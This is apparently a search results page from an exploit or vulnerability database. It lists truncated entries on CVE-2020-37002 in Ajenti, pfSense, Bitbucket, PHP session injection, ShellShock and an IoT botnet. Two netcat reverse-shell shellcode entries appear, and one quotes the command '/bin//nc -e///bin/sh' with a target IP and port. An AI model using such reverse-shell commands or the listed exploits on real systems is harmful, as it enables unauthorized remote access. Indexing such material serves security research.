14 matches found
From-Shell-to-Root
🔥 Red Team Notes Pentesting This repository contains real-w...
vsFTPd-2.3.4-exploit-netcat-revshell-PoC
vsFTPd...
CVE-2020-37002
Ajenti 2.1.36 contains a post-authenticated remote command execution vulnerability that allows remote attackers to execute arbitrary commands after successful login. Attackers can leverage the /api/terminal/create endpoint to send a netcat reverse shell payload targeting a specified IP and port...
CVE-2020-37002
Ajenti 2.1.36 contains a post-authenticated remote command execution vulnerability that allows remote attackers to execute arbitrary commands after successful login. Attackers can leverage the /api/terminal/create endpoint to send a netcat reverse shell payload targeting a specified IP and port...
EUVD-2020-30913
Ajenti 2.1.36 contains an authentication bypass vulnerability that allows remote attackers to execute arbitrary commands after successful login. Attackers can leverage the /api/terminal/create endpoint to send a netcat reverse shell payload targeting a specified IP and port...
CVE-2020-37002 Ajenti 2.1.36 Authenticated Remote Code Execution
Ajenti 2.1.36 contains a post-authenticated remote command execution vulnerability that allows remote attackers to execute arbitrary commands after successful login. Attackers can leverage the /api/terminal/create endpoint to send a netcat reverse shell payload targeting a specified IP and port...
PT-2026-5278
Ajenti 2.1.36 contains an authentication bypass vulnerability that allows remote attackers to execute arbitrary commands after successful login. Attackers can leverage the /api/terminal/create endpoint to send a netcat reverse shell payload targeting a specified IP and port...
Exploit for Command Injection in Netgate Pfsense
pfSense 2.7.0 Command Injection Exploit CVE-2023-42326 This...
Exploit for Argument Injection in Atlassian Bitbucket
CVE-2022-36804: Pre-Auth RCE in Atlassian Bitbucket Server A c...
PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection
Exploit Title: PHP 7.3.15-3 - 'PHPSESSIONUPLOADPROGRESS' Session Data Injection Date: 26/7/2021 Exploit Author: SiLvER | Faisal Alhadlaq Tested on: PHP Version is 7.3.15-3 This poc will abusing PHPSESSIONUPLOADPROGRESS then will trigger race condition to get remote code execution, the script will...
Hackers Prepping IOTroop Botnet with Exploits
Hackers moved one step closer to launching full-scale DDoS attacks using millions of IoT devices herded into the botnet known as Reaper or IOTroop. Researchers at NewSky Security warn that hackers are swapping scripts on forums that can scan the internet for vulnerable IoT devices and dump defaul...
Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)
;The MIT License MIT ;Copyright c 2017 Robert L. Taylor ;Permission is hereby granted, free of charge, to any person obtaining a ;copy of this software and associated documentation files the “Software”, ;to deal in the Software without restriction, including without limitation ;the rights to use,...
Linux Netcat Reverse Shell - 32bit - 77 bytes
Linux Netcat Reverse Shell - 32bit - 77 bytes. Shellcode exploit for linx86 platform include include //[email protected] //OffSec ID: OS-20614 / global start start: ;/bin//nc -e///bin/sh 10.0.0.6 99 xor eax,eax ; clear eax xor edx,edx ; clear edi ; 0xIN-LAST IN-FIRST push 0x3939393...
Exploit for OS Command Injection in Gnu Bash
BadBash ======= CVE-2014-6271 ShellShock RCE PoC tool =====...